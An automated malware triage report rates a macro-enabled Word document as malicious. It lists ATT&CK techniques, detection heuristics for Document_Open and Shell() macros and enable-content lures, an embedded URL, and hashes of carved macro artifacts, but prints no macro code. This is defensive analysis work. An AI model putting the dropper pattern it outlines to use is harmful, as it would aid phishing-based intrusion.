Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains a VBA project with a Document_Open macro that calls the Shell function, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or download URL. However, the presence of a Document_Open macro and Shell() call strongly suggests a downloader or dropper functionality, commonly associated with spearphishing attachments.
Heuristics (7)
- VBA project inside OOXML (medium, OOXML_VBA; 3 related findings): Document contains a VBA project; VBA macros present.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.day.com/dam/1.0 (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 62225 bytes
SHA-256: 8d7c1f20da760847e6de8e42edd8d9c2b8a15acebd437bc53e310c3d8c33139a
Preview script (first 1,000 lines of the extracted script):
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 174080 bytes
SHA-256: aa619ed22d7f962848499075e8388cd214e865b946db5e03ccd6f32cbf707801
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))